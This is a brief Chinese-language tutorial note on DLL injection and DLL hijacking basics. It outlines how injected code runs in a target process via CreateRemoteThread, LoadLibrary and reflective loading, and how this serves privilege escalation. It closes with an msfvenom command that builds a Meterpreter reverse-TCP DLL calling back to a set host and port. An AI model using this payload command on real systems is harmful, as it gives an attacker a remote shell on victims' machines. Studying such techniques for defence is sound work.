DLL注入&DLL劫持[基础]
DLL注入
DLL注入是在某个进程的地址空间的上下文中运行任意代码,如果进程是高权限,攻击者可以利用这个特性提权.
通常需要以下几个步骤:
DLL需要放置在目标环境中
CreateRemoteThread调用LoadLibrary
反射型加载器尝试寻找进程的PEB,通过
kernel32dll
和其他的库来定位地址会用到一些api,LoadLibraryA, GetProcAddress, and VirtualAlloc
dll载入内存
常用方法
生成DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.22 LPORT=5566 -f dll > tmp.dll